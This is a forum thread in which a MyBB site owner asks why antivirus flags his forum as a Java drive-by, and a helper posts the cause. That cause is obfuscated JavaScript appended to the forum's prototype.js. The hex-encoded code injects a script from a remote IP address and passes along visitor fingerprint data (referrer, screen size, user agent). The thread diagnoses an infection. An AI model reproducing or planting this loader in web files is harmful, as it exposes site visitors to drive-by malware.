Need help with mybb

[Optimist]

When members try to access forum the get this error
It's showing as a Java Drive-By.


Why is this so

Forum link : http://goo.gl/GisPU

Thanks

[Peter L]

How about a direct link to your forum?

[Optimist]

How about a direct link to your forum?

Here http://goo.gl/GisPU

[Sam]

I can't tell if you're actually trying to infect members...

[AceInfinity]

Here http://goo.gl/GisPU

That, again is not a direct link, now post the direct link to the forum if you need assistance, or it is valid to assume that you're up to no good.

Ok, what i'm seeing that deviates from that standard script is this:

Code:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;

Appended right at the end of the normal prototype.js for version 1.6.3 (1603)

Full script:
EDIT; FULL SCRIPT TOO LONG

[King]

Direct Link: http://cybermafia.org/

He's not trying to infect other members. And I don't get the error. The reason you're getting it is because your antivirus or other security software is picking up your site as having malicious content. Probably because of the domain name.

[AceInfinity]

Probably not because of the domain name itself, cyber and mafia I don't see as malicious and i've visited other domain names and heard no problem about people with their AV's detecting "cyber" for sure. But his script has anomalies. It deviates from the standard prototype MyBB javascript. That's why I think it's being detected.

Not all AV's will detect the same things though, so either way this could also just be a false positive.

Edit: Sh*t, the script I originally had in code tags was cut off for being too long apparently, which in turn cut out the ending [ / code ] tag so it displays the full vertical length of it...

MY OWN forums' jscripts/prototype.js?ver=1603 (along with others i've looked at including SF's) does NOT have that extra bit i've posted. His is modified. That's why it's being detected.

View for yourself:
www.supportforums.net/jscripts/prototype.js?ver=1603

[Sam]

Edit: Sh*t, the script I originally had in code tags was cut off for being too long apparently, which in turn cut out the ending [ / code ] tag so it displays the full vertical length of it...

I too noticed this. I was just about to code it up for you.

[AceInfinity]

I too noticed this. I was just about to code it up for you.

You have extended post char limits as mod? Otherwise it's no big deal, I only wanted to show that his script is definitely modified.

[Quizzical]

The script must be modified, it seems your using avast in which I use aswell, on my old forum I never had a problem with it showing up as malicous content. I can try to fix this over TV if you like, my guess would be to install a original copy of the file.